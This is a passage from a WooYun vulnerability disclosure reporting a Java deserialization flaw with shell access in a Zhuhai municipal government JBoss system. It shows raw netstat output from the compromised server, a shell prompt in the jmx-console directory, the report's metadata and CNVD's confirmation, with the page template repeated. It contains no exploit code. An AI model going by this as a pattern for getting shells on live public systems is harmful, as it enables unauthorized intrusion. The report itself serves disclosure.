unix  3      [ ]         STREAM     CONNECTED     19045  @/dbus-vfs-daemon/socket-rkCfvaVn
unix  3      [ ]         STREAM     CONNECTED     19043  
unix  3      [ ]         STREAM     CONNECTED     19044  @/dbus-vfs-daemon/socket-vF3cR94a
unix  3      [ ]         STREAM     CONNECTED     19042  
unix  3      [ ]         STREAM     CONNECTED     19039  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19038  
unix  3      [ ]         STREAM     CONNECTED     19037  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19036  
unix  3      [ ]         STREAM     CONNECTED     19020  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19019  
unix  3      [ ]         STREAM     CONNECTED     19017  @/tmp/dbus-eNxFiNQYm9
unix  3      [ ]         STREAM     CONNECTED     19016  
unix  3      [ ]         STREAM     CONNECTED     19013  /tmp/orbit-root/linc-bd8-0-3205b7351ccef
unix  3      [ ]         STREAM     CONNECTED     19012  
unix  3      [ ]         STREAM     CONNECTED     19011  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     19010  
unix  3      [ ]         STREAM     CONNECTED     19009  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     19008  
unix  3      [ ]         STREAM     CONNECTED     19007  /tmp/orbit-root/linc-bd8-0-3205b7351ccef
unix  3      [ ]         STREAM     CONNECTED     19006  
unix  3      [ ]         STREAM     CONNECTED     19000  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     18999  
unix  3      [ ]         STREAM     CONNECTED     18987  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18986  
unix  3      [ ]         STREAM     CONNECTED     18983  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     18982  
unix  3      [ ]         STREAM     CONNECTED     18981  /tmp/orbit-root/linc-bdc-0-490967cc1289c
unix  3      [ ]         STREAM     CONNECTED     18980  
unix  3      [ ]         STREAM     CONNECTED     18979  /tmp/orbit-root/linc-bdc-0-490967cc1289c
unix  3      [ ]         STREAM     CONNECTED     18978  
unix  3      [ ]         STREAM     CONNECTED     18977  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18976  
unix  3      [ ]         STREAM     CONNECTED     18975  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18974  
unix  3      [ ]         STREAM     CONNECTED     18969  /tmp/orbit-root/linc-bdc-0-490967cc1289c
unix  3      [ ]         STREAM     CONNECTED     18968  
unix  3      [ ]         STREAM     CONNECTED     18967  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     18964  
unix  3      [ ]         STREAM     CONNECTED     18955  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18954  
unix  3      [ ]         STREAM     CONNECTED     18735  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18734  
unix  3      [ ]         STREAM     CONNECTED     18733  @/tmp/dbus-eNxFiNQYm9
unix  3      [ ]         STREAM     CONNECTED     18732  
unix  3      [ ]         STREAM     CONNECTED     18715  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18714  
unix  3      [ ]         STREAM     CONNECTED     18711  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18710  
unix  3      [ ]         STREAM     CONNECTED     18709  /tmp/orbit-root/linc-bca-0-5fae6b7bf30be
unix  3      [ ]         STREAM     CONNECTED     18708  
unix  3      [ ]         STREAM     CONNECTED     18703  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18701  
unix  3      [ ]         STREAM     CONNECTED     18696  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18695  
unix  3      [ ]         STREAM     CONNECTED     18693  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18692  
unix  3      [ ]         STREAM     CONNECTED     18689  @/tmp/dbus-eNxFiNQYm9
unix  3      [ ]         STREAM     CONNECTED     18671  
unix  3      [ ]         STREAM     CONNECTED     18628  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18627  
unix  3      [ ]         STREAM     CONNECTED     18606  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18605  
unix  3      [ ]         STREAM     CONNECTED     18602  /tmp/orbit-root/linc-b09-0-5e5e87ecdcf0e
unix  3      [ ]         STREAM     CONNECTED     18600  
unix  3      [ ]         STREAM     CONNECTED     18601  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     18599  
unix  3      [ ]         STREAM     CONNECTED     18596  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18595  
unix  3      [ ]         STREAM     CONNECTED     18586  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18585  
unix  3      [ ]         STREAM     CONNECTED     18582  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18581  
unix  3      [ ]         STREAM     CONNECTED     18578  /tmp/orbit-root/linc-add-0-77b73e82d3d58
unix  3      [ ]         STREAM     CONNECTED     18577  
unix  3      [ ]         STREAM     CONNECTED     18574  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18573  
unix  3      [ ]         STREAM     CONNECTED     18570  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18569  
unix  3      [ ]         STREAM     CONNECTED     18544  /tmp/orbit-root/linc-bc7-0-626c4b87cfd70
unix  3      [ ]         STREAM     CONNECTED     18543  
unix  3      [ ]         STREAM     CONNECTED     18540  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18539  
unix  3      [ ]         STREAM     CONNECTED     18531  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18530  
unix  3      [ ]         STREAM     CONNECTED     18528  /tmp/orbit-root/linc-b49-0-4f813883cc81c
unix  3      [ ]         STREAM     CONNECTED     18527  
unix  3      [ ]         STREAM     CONNECTED     18524  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18523  
unix  3      [ ]         STREAM     CONNECTED     18520  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18519  
unix  3      [ ]         STREAM     CONNECTED     18423  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18422  
unix  3      [ ]         STREAM     CONNECTED     18420  /tmp/orbit-root/linc-af5-0-4595ad0c2518
unix  3      [ ]         STREAM     CONNECTED     18419  
unix  3      [ ]         STREAM     CONNECTED     18415  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18414  
unix  3      [ ]         STREAM     CONNECTED     18399  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18398  
unix  3      [ ]         STREAM     CONNECTED     18359  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18358  
unix  3      [ ]         STREAM     CONNECTED     18322  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18321  
unix  3      [ ]         STREAM     CONNECTED     18312  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18311  
unix  3      [ ]         STREAM     CONNECTED     18263  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18262  
unix  3      [ ]         STREAM     CONNECTED     18261  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18260  
unix  3      [ ]         STREAM     CONNECTED     18256  /tmp/orbit-root/linc-b2f-0-4416838bb5f30
unix  3      [ ]         STREAM     CONNECTED     18255  
unix  3      [ ]         STREAM     CONNECTED     18252  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     18251  
unix  3      [ ]         STREAM     CONNECTED     18246  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18245  
unix  3      [ ]         STREAM     CONNECTED     18241  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     18240  
unix  3      [ ]         STREAM     CONNECTED     18233  /tmp/orbit-root/linc-ae7-0-4ebdda587945e
unix  3      [ ]         STREAM     CONNECTED     18232  
unix  3      [ ]         STREAM     CONNECTED     18231  /tmp/orbit-root/linc-ae5-0-2c56f0f179505
unix  3      [ ]         STREAM     CONNECTED     18230  
unix  3      [ ]         STREAM     CONNECTED     18220  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18219  
unix  3      [ ]         STREAM     CONNECTED     18214  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18212  
unix  3      [ ]         STREAM     CONNECTED     18213  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18211  
unix  3      [ ]         STREAM     CONNECTED     18068  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     18067  
unix  3      [ ]         STREAM     CONNECTED     18066  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18065  
unix  3      [ ]         STREAM     CONNECTED     18031  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18030  
unix  3      [ ]         STREAM     CONNECTED     18022  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     18021  
unix  3      [ ]         STREAM     CONNECTED     17987  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17986  
unix  3      [ ]         STREAM     CONNECTED     17973  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17972  
unix  3      [ ]         STREAM     CONNECTED     17818  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17817  
unix  3      [ ]         STREAM     CONNECTED     17815  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17814  
unix  3      [ ]         STREAM     CONNECTED     17808  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17807  
unix  3      [ ]         STREAM     CONNECTED     17737  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17736  
unix  3      [ ]         STREAM     CONNECTED     17721  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17718  
unix  3      [ ]         STREAM     CONNECTED     17714  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17713  
unix  3      [ ]         STREAM     CONNECTED     17708  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17707  
unix  3      [ ]         STREAM     CONNECTED     17673  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17672  
unix  3      [ ]         STREAM     CONNECTED     17548  @/tmp/.ICE-unix/2673
unix  3      [ ]         STREAM     CONNECTED     17547  
unix  3      [ ]         STREAM     CONNECTED     17545  @/dbus-vfs-daemon/socket-f4wSXWx8
unix  3      [ ]         STREAM     CONNECTED     17544  
unix  3      [ ]         STREAM     CONNECTED     17546  @/dbus-vfs-daemon/socket-L6B9swVs
unix  3      [ ]         STREAM     CONNECTED     17543  
unix  3      [ ]         STREAM     CONNECTED     17537  @/dbus-vfs-daemon/socket-OcpBffGb
unix  3      [ ]         STREAM     CONNECTED     17535  
unix  3      [ ]         STREAM     CONNECTED     17536  @/dbus-vfs-daemon/socket-pVPCPtgd
unix  3      [ ]         STREAM     CONNECTED     17534  
unix  3      [ ]         STREAM     CONNECTED     17527  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17526  
unix  3      [ ]         STREAM     CONNECTED     17525  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17524  
unix  3      [ ]         STREAM     CONNECTED     17519  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17518  
unix  3      [ ]         STREAM     CONNECTED     17515  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17514  
unix  3      [ ]         STREAM     CONNECTED     17510  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17508  
unix  3      [ ]         STREAM     CONNECTED     17506  /tmp/orbit-root/linc-ae5-0-2c56f0f179505
unix  3      [ ]         STREAM     CONNECTED     17505  
unix  3      [ ]         STREAM     CONNECTED     17488  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17487  
unix  3      [ ]         STREAM     CONNECTED     17486  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17485  
unix  3      [ ]         STREAM     CONNECTED     17479  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     17478  
unix  3      [ ]         STREAM     CONNECTED     17477  /tmp/orbit-root/linc-ae7-0-4ebdda587945e
unix  3      [ ]         STREAM     CONNECTED     17476  
unix  3      [ ]         STREAM     CONNECTED     17472  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     17471  
unix  3      [ ]         STREAM     CONNECTED     17470  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17469  
unix  3      [ ]         STREAM     CONNECTED     17468  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17467  
unix  3      [ ]         STREAM     CONNECTED     17466  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     17465  
unix  3      [ ]         STREAM     CONNECTED     17464  /tmp/orbit-root/linc-ae5-0-2c56f0f179505
unix  3      [ ]         STREAM     CONNECTED     17463  
unix  3      [ ]         STREAM     CONNECTED     17462  /tmp/orbit-root/linc-ae7-0-4ebdda587945e
unix  3      [ ]         STREAM     CONNECTED     17461  
unix  3      [ ]         STREAM     CONNECTED     17458  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     17457  
unix  3      [ ]         STREAM     CONNECTED     17454  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     17453  
unix  3      [ ]         STREAM     CONNECTED     17448  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17447  
unix  3      [ ]         STREAM     CONNECTED     17438  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17437  
unix  3      [ ]         STREAM     CONNECTED     17433  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17432  
unix  3      [ ]         STREAM     CONNECTED     17425  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17424  
unix  3      [ ]         STREAM     CONNECTED     17357  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     17356  
unix  3      [ ]         STREAM     CONNECTED     17354  /tmp/orbit-root/linc-adf-0-43a6dd3c6c6b3
unix  3      [ ]         STREAM     CONNECTED     17353  
unix  3      [ ]         STREAM     CONNECTED     17351  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17350  
unix  3      [ ]         STREAM     CONNECTED     17281  @/tmp/.ICE-unix/2673
unix  3      [ ]         STREAM     CONNECTED     17280  
unix  3      [ ]         STREAM     CONNECTED     17277  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17276  
unix  3      [ ]         STREAM     CONNECTED     17274  /tmp/orbit-root/linc-ad3-0-7d60104053393
unix  3      [ ]         STREAM     CONNECTED     17273  
unix  3      [ ]         STREAM     CONNECTED     17270  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     17269  
unix  3      [ ]         STREAM     CONNECTED     17268  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17267  
unix  3      [ ]         STREAM     CONNECTED     17262  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17261  
unix  3      [ ]         STREAM     CONNECTED     17196  @/tmp/.ICE-unix/2673
unix  3      [ ]         STREAM     CONNECTED     17195  
unix  3      [ ]         STREAM     CONNECTED     17194  /tmp/orbit-root/linc-acf-0-4d99a72c2606e
unix  3      [ ]         STREAM     CONNECTED     17193  
unix  3      [ ]         STREAM     CONNECTED     17190  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     17189  
unix  3      [ ]         STREAM     CONNECTED     17186  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17185  
unix  3      [ ]         STREAM     CONNECTED     17182  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17181  
unix  3      [ ]         STREAM     CONNECTED     17136  /tmp/orbit-root/linc-ac6-0-7db5087b1f59a
unix  3      [ ]         STREAM     CONNECTED     17135  
unix  3      [ ]         STREAM     CONNECTED     17132  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     17131  
unix  3      [ ]         STREAM     CONNECTED     17128  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17127  
unix  2      [ ]         DGRAM                    17126  
unix  3      [ ]         STREAM     CONNECTED     17108  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17107  
unix  3      [ ]         STREAM     CONNECTED     17104  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17103  
unix  3      [ ]         STREAM     CONNECTED     17099  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17098  
unix  3      [ ]         STREAM     CONNECTED     17085  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     17084  
unix  3      [ ]         STREAM     CONNECTED     17059  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17058  
unix  3      [ ]         STREAM     CONNECTED     17053  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     17052  
unix  3      [ ]         STREAM     CONNECTED     16994  /tmp/orbit-root/linc-abe-0-502750df141
unix  3      [ ]         STREAM     CONNECTED     16993  
unix  3      [ ]         STREAM     CONNECTED     16990  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     16989  
unix  3      [ ]         STREAM     CONNECTED     16985  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     16984  
unix  3      [ ]         STREAM     CONNECTED     16977  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16976  
unix  3      [ ]         STREAM     CONNECTED     16911  /tmp/orbit-root/linc-a67-0-11cad70cd8e40
unix  3      [ ]         STREAM     CONNECTED     16910  
unix  3      [ ]         STREAM     CONNECTED     16907  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     16906  
unix  3      [ ]         STREAM     CONNECTED     16902  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     16901  
unix  3      [ ]         STREAM     CONNECTED     16818  /tmp/orbit-root/linc-a71-0-1861f820a5cd7
unix  3      [ ]         STREAM     CONNECTED     16817  
unix  3      [ ]         STREAM     CONNECTED     16814  /tmp/orbit-root/linc-ab5-0-13eb25979fd46
unix  3      [ ]         STREAM     CONNECTED     16813  
unix  3      [ ]         STREAM     CONNECTED     16810  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16809  
unix  3      [ ]         STREAM     CONNECTED     16576  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     16575  
unix  3      [ ]         STREAM     CONNECTED     16562  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16561  
unix  3      [ ]         STREAM     CONNECTED     16535  @/tmp/dbus-i6cjQRwfHU
unix  3      [ ]         STREAM     CONNECTED     16534  
unix  3      [ ]         STREAM     CONNECTED     16529  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16528  
unix  3      [ ]         STREAM     CONNECTED     16484  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16483  
unix  3      [ ]         STREAM     CONNECTED     16482  
unix  3      [ ]         STREAM     CONNECTED     16481  
unix  3      [ ]         STREAM     CONNECTED     16468  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16467  
unix  3      [ ]         STREAM     CONNECTED     16373  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16372  
unix  2      [ ]         DGRAM                    16221  
unix  3      [ ]         STREAM     CONNECTED     16196  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16194  
unix  3      [ ]         STREAM     CONNECTED     16099  @/tmp/gdm-session-IqXKaYAH
unix  3      [ ]         STREAM     CONNECTED     16097  
unix  3      [ ]         STREAM     CONNECTED     16091  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16090  
unix  2      [ ]         DGRAM                    16033  
unix  3      [ ]         STREAM     CONNECTED     16027  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16026  
unix  3      [ ]         STREAM     CONNECTED     16014  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16013  
unix  2      [ ]         DGRAM                    16012  
unix  3      [ ]         STREAM     CONNECTED     15291  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15290  
unix  3      [ ]         STREAM     CONNECTED     15286  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15285  
unix  3      [ ]         STREAM     CONNECTED     15216  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     15215  
unix  3      [ ]         STREAM     CONNECTED     15201  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     15200  
unix  3      [ ]         STREAM     CONNECTED     15124  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15123  
unix  3      [ ]         STREAM     CONNECTED     15100  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15099  
unix  3      [ ]         STREAM     CONNECTED     15025  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15024  
unix  3      [ ]         STREAM     CONNECTED     15030  @/tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     15023  
unix  3      [ ]         STREAM     CONNECTED     14978  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     14977  
unix  3      [ ]         STREAM     CONNECTED     14912  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     14911  
unix  3      [ ]         STREAM     CONNECTED     14791  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     14790  
unix  2      [ ]         DGRAM                    14643  
unix  2      [ ]         DGRAM                    14619  
unix  2      [ ]         DGRAM                    14558  
unix  3      [ ]         STREAM     CONNECTED     14545  
unix  3      [ ]         STREAM     CONNECTED     14544  
unix  3      [ ]         STREAM     CONNECTED     14541  
unix  3      [ ]         STREAM     CONNECTED     14540  
unix  3      [ ]         STREAM     CONNECTED     14537  
unix  3      [ ]         STREAM     CONNECTED     14536  
unix  3      [ ]         STREAM     CONNECTED     14533  
unix  3      [ ]         STREAM     CONNECTED     14532  
unix  3      [ ]         STREAM     CONNECTED     14529  
unix  3      [ ]         STREAM     CONNECTED     14528  
unix  3      [ ]         STREAM     CONNECTED     14525  
unix  3      [ ]         STREAM     CONNECTED     14524  
unix  3      [ ]         STREAM     CONNECTED     14521  
unix  3      [ ]         STREAM     CONNECTED     14520  
unix  3      [ ]         STREAM     CONNECTED     14517  
unix  3      [ ]         STREAM     CONNECTED     14516  
unix  3      [ ]         STREAM     CONNECTED     14513  
unix  3      [ ]         STREAM     CONNECTED     14512  
unix  3      [ ]         STREAM     CONNECTED     14509  
unix  3      [ ]         STREAM     CONNECTED     14508  
unix  3      [ ]         STREAM     CONNECTED     14505  
unix  3      [ ]         STREAM     CONNECTED     14504  
unix  3      [ ]         STREAM     CONNECTED     14501  
unix  3      [ ]         STREAM     CONNECTED     14500  
unix  3      [ ]         STREAM     CONNECTED     14497  
unix  3      [ ]         STREAM     CONNECTED     14496  
unix  3      [ ]         STREAM     CONNECTED     14493  
unix  3      [ ]         STREAM     CONNECTED     14492  
unix  3      [ ]         STREAM     CONNECTED     14489  
unix  3      [ ]         STREAM     CONNECTED     14488  
unix  3      [ ]         STREAM     CONNECTED     14485  
unix  3      [ ]         STREAM     CONNECTED     14484  
unix  3      [ ]         STREAM     CONNECTED     14481  
unix  3      [ ]         STREAM     CONNECTED     14480  
unix  3      [ ]         STREAM     CONNECTED     14477  
unix  3      [ ]         STREAM     CONNECTED     14476  
unix  3      [ ]         STREAM     CONNECTED     14473  
unix  3      [ ]         STREAM     CONNECTED     14472  
unix  3      [ ]         STREAM     CONNECTED     14469  
unix  3      [ ]         STREAM     CONNECTED     14468  
unix  3      [ ]         STREAM     CONNECTED     14465  
unix  3      [ ]         STREAM     CONNECTED     14464  
unix  3      [ ]         STREAM     CONNECTED     14462  
unix  3      [ ]         STREAM     CONNECTED     14461  
unix  3      [ ]         STREAM     CONNECTED     14458  
unix  3      [ ]         STREAM     CONNECTED     14457  
unix  3      [ ]         STREAM     CONNECTED     14455  
unix  3      [ ]         STREAM     CONNECTED     14454  
unix  2      [ ]         DGRAM                    14415  
unix  2      [ ]         DGRAM                    14164  
unix  3      [ ]         STREAM     CONNECTED     14111  /var/run/acpid.socket
unix  3      [ ]         STREAM     CONNECTED     14110  
unix  3      [ ]         STREAM     CONNECTED     14105  @/var/run/hald/dbus-HjcjQ8ncHW
unix  3      [ ]         STREAM     CONNECTED     14104  
unix  3      [ ]         STREAM     CONNECTED     14055  @/var/run/hald/dbus-HjcjQ8ncHW
unix  3      [ ]         STREAM     CONNECTED     14054  
unix  3      [ ]         STREAM     CONNECTED     13825  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13822  
unix  3      [ ]         STREAM     CONNECTED     13781  @/var/run/hald/dbus-9NCC25lyNz
unix  3      [ ]         STREAM     CONNECTED     13780  
unix  3      [ ]         STREAM     CONNECTED     13741  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13740  
unix  2      [ ]         DGRAM                    13675  
unix  2      [ ]         DGRAM                    13328  
unix  3      [ ]         STREAM     CONNECTED     13289  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13288  
unix  2      [ ]         DGRAM                    13287  
unix  3      [ ]         STREAM     CONNECTED     13260  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13259  
unix  3      [ ]         STREAM     CONNECTED     13247  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13246  
unix  2      [ ]         DGRAM                    13242  
unix  3      [ ]         STREAM     CONNECTED     13215  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     13214  
unix  3      [ ]         STREAM     CONNECTED     13208  
unix  3      [ ]         STREAM     CONNECTED     13207  
unix  3      [ ]         DGRAM                    10260  
unix  3      [ ]         DGRAM                    10259  
/home/jboss-4.2.2.GA/server/default/./deploy/jmx-console.war/jmx-console>
修复方案：

加强安全意识
版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

危害等级：高
漏洞Rank：11
确认时间：2016-01-08 17:53
厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给广东分中心，由广东分中心后续协调网站管理单位处置。
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167125

漏洞标题：珠海市政府某系统存在“Java 反序列化”漏洞，并getshell

相关厂商：

漏洞作者：朱元璋

提交时间：2016-01-04 11:30

修复时间：2016-02-22 17:50

公开时间：2016-02-22 17:50

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167125

漏洞标题：珠海市政府某系统存在“Java 反序列化”漏洞，并getshell

相关厂商：

漏洞作者： 朱元璋

提交时间：2016-01-04 11:30

修复时间：2016-02-22 17:50

公开时间：2016-02-22 17:50

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0167125"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

